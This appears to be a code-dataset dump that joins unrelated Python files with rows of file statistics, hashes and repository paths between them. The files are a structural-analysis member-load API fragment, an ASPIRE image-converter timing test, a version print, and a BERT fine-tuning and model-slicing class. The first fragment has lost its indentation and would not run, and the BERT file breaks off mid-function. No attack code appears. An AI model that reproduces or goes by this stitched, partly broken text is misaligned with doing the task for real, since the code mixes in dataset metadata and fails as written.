clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_PIPE_CONTENT_PARTIAL
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = MemberSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE.name
#Member Load Orientation
clientObject.load_direction_orientation = load_direction_orientation.name
#Load Magnitude
clientObject.magnitude = specific_weight
#Filling Height
clientObject.filling_height = filling_height
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def PipeInternalPressure(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
pressure : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
pressure (float): Pressure
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_PIPE_INTERNAL_PRESSURE
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X.name
#Load Magnitude
clientObject.magnitude = pressure
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def RotaryMotion(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
angular_acceleration : float = 0.0,
angular_velocity : float = 0.0,
axis_definition_type = MemberSetLoadAxisDefinitionType.AXIS_DEFINITION_TWO_POINTS,
axis_orientation = MemberSetLoadAxisDefinitionAxisOrientation.AXIS_POSITIVE,
axis_definition = MemberSetLoadAxisDefinition.AXIS_X,
axis_definition_p1 = [],
axis_definition_p2 = [],
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
angular_acceleration (float): Angular Acceleration
angular_velocity (float): Angular Velocity
axis_definition_type (enum): Axis Definition Type Enumeration
axis_orientation (enum): Axis Orientation Enumeration
axis_definition (enum): Axis Definition Enumeration
axis_definition_p1 (list):Axis Definition First Point
axis_definition_p2 (list): Axis Definition Second Point
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_ROTARY_MOTION
clientObject.load_type = load_type.name
#Angular Acceleration
clientObject.angular_acceleration = angular_acceleration
#Angular Velocity
clientObject.angular_velocity = angular_velocity
#Axis Definition Type
clientObject.axis_definition_type = axis_definition_type.name
#Axis definition
if axis_definition_type == MemberSetLoadAxisDefinitionType.AXIS_DEFINITION_TWO_POINTS.name:
clientObject.axis_definition_p1_x = axis_definition_p1[0]
clientObject.axis_definition_p1_y = axis_definition_p1[1]
clientObject.axis_definition_p1_z = axis_definition_p1[2]
clientObject.axis_definition_p2_x = axis_definition_p2[0]
clientObject.axis_definition_p2_y = axis_definition_p2[1]
clientObject.axis_definition_p2_z = axis_definition_p2[2]
elif axis_definition_type == MemberSetLoadAxisDefinitionType.AXIS_DEFINITION_POINT_AND_AXIS.name:
clientObject.axis_definition_p1_x = axis_definition_p1[0]
clientObject.axis_definition_p1_y = axis_definition_p1[1]
clientObject.axis_definition_p1_z = axis_definition_p1[2]
clientObject.axis_definition_axis = axis_definition.name
clientObject.axis_definition_axis_orientation = axis_orientation.name
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject) | 47.55575 | 278 | 0.636401 | 11,387 | 108,760 | 5.762888 | 0.021077 | 0.118863 | 0.035842 | 0.027796 | 0.95916 | 0.955518 | 0.949758 | 0.941346 | 0.937475 | 0.922892 | 0 | 0.013969 | 0.299641 | 108,760 | 2,287 | 279 | 47.55575 | 0.84754 | 0.200717 | 0 | 0.910598 | 0 | 0 | 0.139522 | 0.052337 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011536 | false | 0.007931 | 0.001442 | 0 | 0.013699 | 0.009373 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ceb23e87249c8e7891a32d92bff3f3fc9d97d3c | 6,721 | py | Python | src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/test.py | janden/ASPIRE-Python | 5bcf831881fd0e42630c3b99671c5ed08de260ea | [
"MIT"
] | null | null | null | src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/test.py | janden/ASPIRE-Python | 5bcf831881fd0e42630c3b99671c5ed08de260ea | [
"MIT"
] | null | null | null | src/aspire/aspire/em_classavg/image_denoising/image_denoising/ConverterModel/test.py | janden/ASPIRE-Python | 5bcf831881fd0e42630c3b99671c5ed08de260ea | [
"MIT"
] | null | null | null | import numpy as np
from ConverterModel.Converter import Converter
from scipy.misc import imresize
import time
import os
def test():
data_path = os.path.join('test_data', 'example_data_np_array.npy')
images = np.load(data_path)
num_images = images.shape[2]
bandlimit_ratio = 1.0
truncation_parameter = 1
resolutions = [64]
images_multiplier = 100
n = images_multiplier * num_images
for resolution in resolutions:
# testing with odd grid
scaled_images = np.zeros((2 * resolution + 1, 2 * resolution + 1, num_images))
for j in range(num_images):
scaled_images[:, :, j] = imresize(images[:, :, j], (2 * resolution + 1, 2 * resolution + 1))
scaled_images = np.repeat(scaled_images, images_multiplier, axis=2)
print("testing images of size {}\n".format(scaled_images.shape[0]))
# initializing models
tic1 = time.clock()
converter = Converter(scaled_images.shape[0], truncation_parameter, beta=bandlimit_ratio)
tic2 = time.clock()
converter.init_fast()
tic3 = time.clock()
converter.init_direct()
tic4 = time.clock()
print("finished initializing PSWF2D in {}".format(tic2 - tic1))
print("finished initializing FastModel in {}".format(tic3 - tic2))
print("finished initializing DirectModel in {}\n".format(tic4 - tic3))
# forwarding images
tic = time.clock()
coefficients_fast = converter.fast_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t/n
print("finished fast forwarding {} images in {} seconds, average of {} seconds per image".format(n, t, tpi))
tic = time.clock()
coefficients_direct = converter.direct_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t/n
print("finished direct forwarding {} images in {} seconds, average of {} seconds per image\n".format(n, t, tpi))
# test if coefficients are the same
print("Maximum absolute difference between coefficients is {}\n".format(np.max(np.absolute(coefficients_fast - coefficients_direct))))
# test reconstruction error
tic = time.clock()
reconstructed_images_direct = converter.direct_backward(coefficients_direct)
reconstructed_images_fast = converter.direct_backward(coefficients_fast)
toc = time.clock()
t = toc - tic
tpi = t / (2 * n)
print("finished backward of {} images in {} seconds, average of {} seconds per image\n".format(2 * n, t, tpi))
x_1d_grid = range(-resolution, resolution + 1)
x_2d_grid, y_2d_grid = np.meshgrid(x_1d_grid, x_1d_grid)
r_2d_grid = np.sqrt(np.square(x_2d_grid) + np.square(y_2d_grid))
points_inside_the_circle = r_2d_grid <= resolution
err_slow = reconstructed_images_direct - scaled_images
e_slow = np.mean(np.square(np.absolute(err_slow)), axis=2)
e_slow = np.sum(e_slow[points_inside_the_circle])
err_fast = reconstructed_images_fast - scaled_images
e_fast = np.mean(np.square(np.absolute(err_fast)), axis=2)
e_fast = np.sum(e_fast[points_inside_the_circle])
p = np.mean(np.square(np.absolute(scaled_images)), axis=2)
p = np.sum(p[points_inside_the_circle])
print("odd images with resolution {} fast coefficients reconstructed error: {}".format(resolution, e_fast / p))
print("odd images with resolution {} direct coefficients reconstructed error: {}\n".format(resolution, e_slow / p))
# testing with even grid
scaled_images = np.zeros((2 * resolution, 2 * resolution, num_images))
for j in range(num_images):
scaled_images[:, :, j] = imresize(images[:, :, j], (2 * resolution, 2 * resolution))
scaled_images = np.repeat(scaled_images, images_multiplier, axis=2)
print("testing images of size {}\n".format(scaled_images.shape[0]))
# initializing models
tic1 = time.clock()
converter = Converter(scaled_images.shape[0], truncation_parameter, beta=bandlimit_ratio)
tic2 = time.clock()
converter.init_fast()
tic3 = time.clock()
converter.init_direct()
tic4 = time.clock()
print("finished initializing PSWF2D in {}".format(tic2 - tic1))
print("finished initializing FastModel in {}".format(tic3 - tic2))
print("finished initializing DirectModel in {}\n".format(tic4 - tic3))
# forwarding images
tic = time.clock()
coefficients_fast = converter.fast_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t / n
print("finished fast forwarding {} images in {} seconds, average of {} seconds per image".format(n, t, tpi))
tic = time.clock()
coefficients_direct = converter.direct_forward(scaled_images)
toc = time.clock()
t = toc - tic
tpi = t / n
print("finished direct forwarding {} images in {} seconds, average of {} seconds per image\n".format(n, t, tpi))
# test if coefficients are the same
print("Maximum absolute difference between coefficients is {}\n".format(np.max(np.absolute(coefficients_fast - coefficients_direct))))
# test reconstruction error
tic = time.clock()
reconstructed_images_direct = converter.direct_backward(coefficients_direct)
reconstructed_images_fast = converter.direct_backward(coefficients_fast)
toc = time.clock()
t = toc - tic
tpi = t / (2 * n)
print("finished backward of {} images in {} seconds, average of {} seconds per image\n".format(2 * n, t, tpi))
x_1d_grid = range(-resolution, resolution)
x_2d_grid, y_2d_grid = np.meshgrid(x_1d_grid, x_1d_grid)
r_2d_grid = np.sqrt(np.square(x_2d_grid) + np.square(y_2d_grid))
points_inside_the_circle = r_2d_grid <= resolution
err_slow = reconstructed_images_direct - scaled_images
e_slow = np.mean(np.square(np.absolute(err_slow)), axis=2)
e_slow = np.sum(e_slow[points_inside_the_circle])
err_fast = reconstructed_images_fast - scaled_images
e_fast = np.mean(np.square(np.absolute(err_fast)), axis=2)
e_fast = np.sum(e_fast[points_inside_the_circle])
p = np.mean(np.square(np.absolute(scaled_images)), axis=2)
p = np.sum(p[points_inside_the_circle])
print("even images with resolution {} fast coefficients reconstructed error: {}".format(resolution, e_fast / p))
print("even images with resolution {} direct coefficients reconstructed error: {}\n".format(resolution, e_slow / p))
test()
| 43.642857 | 142 | 0.652433 | 873 | 6,721 | 4.83047 | 0.127148 | 0.062604 | 0.028456 | 0.039839 | 0.911548 | 0.908229 | 0.902063 | 0.885938 | 0.885938 | 0.885938 | 0 | 0.015181 | 0.23553 | 6,721 | 153 | 143 | 43.928105 | 0.805566 | 0.035709 | 0 | 0.77193 | 0 | 0 | 0.186708 | 0.003864 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008772 | false | 0 | 0.04386 | 0 | 0.052632 | 0.175439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1413c46fc707943afd71728d3671c25052a801be | 16 | py | Python | main.py | lukeyeager/github-testing | 03cadc83d4587bf0c4787e4a308056019aa8d6f6 | [
"MIT"
] | null | null | null | main.py | lukeyeager/github-testing | 03cadc83d4587bf0c4787e4a308056019aa8d6f6 | [
"MIT"
] | 10 | 2015-07-07T23:39:54.000Z | 2016-08-30T23:40:38.000Z | main.py | lukeyeager/github-testing | 03cadc83d4587bf0c4787e4a308056019aa8d6f6 | [
"MIT"
] | null | null | null | print('10.1.0')
| 8 | 15 | 0.5625 | 4 | 16 | 2.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.266667 | 0.0625 | 16 | 1 | 16 | 16 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
14946f08002b0427fded5f5eed961e9123e8a523 | 32,765 | py | Python | bert/models/bert/bert.py | fanshiqing/DAPPLE | b2d2ceda90f6033b316f672ec05f45123234f130 | [
"BSD-3-Clause"
] | 50 | 2020-02-02T09:24:44.000Z | 2022-03-01T03:22:19.000Z | bert/models/bert/bert.py | fanshiqing/DAPPLE | b2d2ceda90f6033b316f672ec05f45123234f130 | [
"BSD-3-Clause"
] | 1 | 2020-02-04T03:50:02.000Z | 2020-02-04T04:41:37.000Z | bert/models/bert/bert.py | AlibabaPAI/DAPPLE | fd75dcfbc6c73a7624b9fd9d8c3334e5d04bcd20 | [
"BSD-3-Clause"
] | 9 | 2020-02-02T09:23:31.000Z | 2021-09-22T07:24:34.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from models.bert import modeling
from models.bert import modeling_slice
import tensorflow as tf
from tensorflow import logging
import sys
slim = tf.contrib.slim
def gather_indexes(sequence_tensor, positions):
"""Gathers the vectors at the specific positions over a minibatch."""
sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3)
batch_size = sequence_shape[0]
seq_length = sequence_shape[1]
width = sequence_shape[2]
flat_offsets = tf.reshape(
tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
flat_positions = tf.reshape(positions + flat_offsets, [-1])
flat_sequence_tensor = tf.reshape(sequence_tensor,
[batch_size * seq_length, width])
output_tensor = tf.gather(flat_sequence_tensor, flat_positions)
return output_tensor
def bert_arg_scope(
weight_decay=0.00004,
batch_norm_decay=0.9997,
batch_norm_epsilon=0.001,
activation_fn=tf.nn.relu,
batch_norm_updates_collections=tf.GraphKeys.UPDATE_OPS):
"""Returns the scope with the default parameters.
Args:
weight_decay: the weight decay for weights variables.
batch_norm_decay: decay for the moving average of batch_norm momentums.
batch_norm_epsilon: small float added to variance to avoid dividing by zero.
activation_fn: Activation function for conv2d.
batch_norm_updates_collections: Collection for the update ops for
batch norm.
Returns:
a arg_scope with the parameters.
"""
# Set weight_decay for weights in conv2d and fully_connected layers.
with slim.arg_scope([slim.conv2d, slim.fully_connected],
weights_regularizer=slim.l2_regularizer(weight_decay),
biases_regularizer=slim.l2_regularizer(weight_decay)):
batch_norm_params = {
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon,
'updates_collections': batch_norm_updates_collections,
'fused': None, # Use fused batch norm if possible.
}
# Set activation_fn and parameters for batch_norm.
with slim.arg_scope([slim.conv2d], activation_fn=activation_fn,
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params) as scope:
return scope
class BertFinetune(object):
"""
Fintune Method based on Bert.
"""
def __init__(self, bert_config_file, max_seq_length, is_training,
input_ids, input_mask, segment_ids, labels, use_one_hot_embeddings,
model_type='classification', kwargs=None):
bert_config = modeling.BertConfig.from_json_file(bert_config_file)
if max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(max_seq_length, bert_config.max_position_embeddings))
self.model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
self.bert_config = bert_config
self.kwargs = kwargs
self.labels = labels
self.input_ids = input_ids
if model_type == 'classification':
self.build_output_layer_classification()
elif model_type == 'regression':
self.build_output_layer_regression()
elif model_type == 'mrc':
self.build_output_layer_squad()
elif model_type == 'pretrain':
self.build_pretrain()
else:
raise ValueError("model_type should be one of ['classification', "
"'regression', pretrain', 'mrc'].")
self.saver = tf.train.Saver(
var_list=tf.global_variables(),
max_to_keep=2)
def restore(self, saver_directory, sess):
checkpoint = tf.train.latest_checkpoint(saver_directory)
if not checkpoint:
logging.info("Couldn't find trained model at %s." % saver_directory)
else:
logging.info('restore from {}'.format(checkpoint))
self.saver.restore(sess, checkpoint)
def save(self, saver_directory, sess, step=None):
logging.info("Save to %s." % saver_directory)
if step is not None:
self.saver.save(sess, saver_directory, global_step=step)
else:
self.saver.save(sess, saver_directory)
def build_pretrain(self):
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = self.get_masked_lm_output(
self.bert_config,
self.model.get_sequence_output(),
self.model.get_embedding_table(),
self.kwargs['masked_lm_positions'],
self.kwargs['masked_lm_ids'],
self.kwargs['masked_lm_weights'])
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = self.get_next_sentence_output(
self.bert_config,
self.model.get_pooled_output(),
self.kwargs['next_sentence_labels'])
self.loss = masked_lm_loss + next_sentence_loss
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(self.kwargs['masked_lm_ids'], [-1])
masked_lm_weights = tf.reshape(self.kwargs['masked_lm_weights'], [-1])
masked_lm_accuracy = tf.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(self.kwargs['next_sentence_labels'], [-1])
next_sentence_accuracy = tf.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.metrics.mean(
values=next_sentence_example_loss)
self.eval_metric = {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
def get_masked_lm_output(self, bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling.get_activation(bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
bert_config.initializer_range))
input_tensor = modeling.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
# log_probs = tf.nn.log_softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
def get_next_sentence_output(self, bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.variable_scope("cls/seq_relationship"):
output_weights = tf.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling.create_initializer(bert_config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
# log_probs = tf.nn.log_softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def build_output_layer_regression(self):
with tf.variable_scope("src-output-layer"):
self.src_estimation = tf.contrib.layers.fully_connected(
inputs=self.model.get_pooled_output(),
num_outputs=1,
activation_fn=None, #tf.nn.sigmoid
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(scale=1e-3),
biases_initializer=tf.constant_initializer(1e-04),
scope="FC"
)
self.src_prediction = self.src_estimation
self.src_pred_cost = tf.add(
tf.reduce_mean(tf.pow(self.src_prediction - self.labels, 2)),
tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)),
name="src_cost")
self.loss = self.src_pred_cost
self.logits = self.src_estimation
self.predictions = self.src_prediction
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
print('loss', self.loss)
print('logits', self.logits)
print('predictions', self.predictions)
print('accuracy', self.accuracy)
def build_output_layer_classification(self):
with tf.variable_scope("src-output-layer"):
self.src_estimation = tf.contrib.layers.fully_connected(
inputs=self.model.get_pooled_output(),
num_outputs=2,
activation_fn=None,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(scale=1e-3),
biases_initializer=tf.constant_initializer(1e-04),
scope="FC"
)
self.src_prediction = tf.contrib.layers.softmax(self.src_estimation)[:, 1]
self.src_pred_cost = tf.add(
tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.src_estimation, labels=self.labels)),
tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)),
name="src_cost")
self.loss = self.src_pred_cost
self.logits = self.src_estimation
self.predictions = self.src_prediction
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
print('logits', self.logits)
print('predictions', self.predictions)
print('accuracy', self.accuracy)
def build_output_layer_squad(self, is_training=False):
final_hidden = self.model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
# compute loss
seq_length = modeling.get_shape_list(self.input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
def def_loss():
start_positions = self.kwargs["start_positions"]
end_positions = self.kwargs["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
loss = (start_loss + end_loss) / 2.0
return loss
self.loss = def_loss()
def build_output_layer(self, is_training):
output_layer = self.model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.get_variable(
"output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [2], initializer=tf.zeros_initializer())
print('output_layer', output_layer.shape)
print('output_weights', output_weights.shape)
print('output_bias', output_bias.shape)
with tf.variable_scope("loss"):
if is_training:
# I.e., 0.1 dropout
output_layer = tf.nn.dropout(output_layer, keep_prob=0.9)
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
self.logits = logits
log_probs = tf.nn.log_softmax(self.logits)
print('logits', logits.shape)
one_hot_labels = tf.one_hot(self.labels, depth=2,
dtype=tf.float32)
self.per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
self.loss = tf.reduce_mean(self.per_example_loss)
self.predictions = tf.argmax(self.logits, axis=-1, output_type=tf.int32)
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
class BertFinetuneSlice(object):
"""
Fintune Method based on Bert.
"""
def __init__(self, bert_config_file, max_seq_length, is_training,
input_ids, input_mask, segment_ids, labels, use_one_hot_embeddings,
model_type='classification', slice_devices="/device:GPU:0",
dep_outputs=None, kwargs=None):
bert_config = modeling_slice.BertConfig.from_json_file(bert_config_file)
if max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(max_seq_length, bert_config.max_position_embeddings))
self.model = modeling_slice.BertModelSlice(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
if not isinstance(slice_devices, list):
logging.info("SLICE DEVICES: ", slice_devices)
self.devices = slice_devices.split(",")
else:
self.devices = slice_devices
self.stages = self.model.stages
ndev = len(self.devices)
nstage = len(self.stages)
def calc_device(i):
# Bert-24
if nstage == 27:
# 11:13
return 0 if i < 13 else 1
# Bert-48
elif nstage == 51:
# 23:25
return 0 if i < 25 else 1
else:
print("Unrecognized nstage, only bert-24 and bert-48 are supported.")
sys.exit(0)
# idx = int((i+2) / ((nstage+1) / ndev + 1))
# return idx
self.stage_outputs = []
prev_output = input_ids
prev_device_idx = 0
for i in xrange(nstage):
device_idx = calc_device(i)
if (i == 0 or device_idx != prev_device_idx) and \
(dep_outputs is not None and dep_outputs[device_idx] is not None):
#print ("***DEPS***", dep_outputs[device_idx])
dep = dep_outputs[device_idx] if isinstance(dep_outputs[device_idx], list) else [dep_outputs[device_idx]]
with tf.control_dependencies(dep), tf.device(self.devices[device_idx]):
output = self.stages[i](prev_output)
if device_idx != prev_device_idx:
self.stage_outputs.append(prev_output)
prev_device_idx = device_idx
prev_output = output
continue
if device_idx != prev_device_idx:
self.stage_outputs.append(prev_output)
prev_device_idx = device_idx
#with tf.control_dependencies([prev_output]), tf.device(self.devices[device_idx]):
with tf.device(self.devices[device_idx]):
output = self.stages[i](prev_output)
prev_output = output
self.bert_config = bert_config
self.kwargs = kwargs
self.labels = labels
self.input_ids = input_ids
if model_type == 'classification':
self.build_output_layer_classification()
elif model_type == 'regression':
self.build_output_layer_regression()
elif model_type == 'mrc':
with tf.device(self.devices[device_idx]):
self.build_output_layer_squad()
self.stage_outputs.append(self.loss)
elif model_type == 'pretrain':
self.build_pretrain()
else:
raise ValueError("model_type should be one of ['classification', "
"'regression', pretrain', 'mrc'].")
self.saver = tf.train.Saver(
var_list=tf.global_variables(),
max_to_keep=2)
def restore(self, saver_directory, sess):
checkpoint = tf.train.latest_checkpoint(saver_directory)
if not checkpoint:
logging.info("Couldn't find trained model at %s." % saver_directory)
else:
logging.info('restore from {}'.format(checkpoint))
self.saver.restore(sess, checkpoint)
def save(self, saver_directory, sess, step=None):
logging.info("Save to %s." % saver_directory)
if step is not None:
self.saver.save(sess, saver_directory, global_step=step)
else:
self.saver.save(sess, saver_directory)
def build_pretrain(self):
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = self.get_masked_lm_output(
self.bert_config,
self.model.get_sequence_output(),
self.model.get_embedding_table(),
self.kwargs['masked_lm_positions'],
self.kwargs['masked_lm_ids'],
self.kwargs['masked_lm_weights'])
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = self.get_next_sentence_output(
self.bert_config,
self.model.get_pooled_output(),
self.kwargs['next_sentence_labels'])
self.loss = masked_lm_loss + next_sentence_loss
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
